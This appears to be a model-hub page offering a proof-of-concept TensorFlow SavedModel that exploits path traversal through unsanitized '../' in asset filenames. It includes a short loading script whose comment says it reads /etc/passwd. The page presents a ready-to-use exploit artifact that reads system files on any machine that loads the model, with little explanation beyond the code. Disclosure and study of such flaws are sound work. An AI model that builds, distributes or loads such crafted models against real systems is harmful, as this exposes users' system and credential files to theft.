TF-Keras

TensorFlow SavedModel Path Traversal PoC

Proof-of-concept for path traversal via AssetFileDef.filename in TensorFlow's SavedModel loading.

Vulnerability: tensorflow/python/trackable/asset.py - unsanitized ../ in asset filenames.

import tensorflow as tf
model = tf.saved_model.load("./")
result = model.read_asset()
print(result.numpy().decode())  # Reads /etc/passwd
Downloads last month
38
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support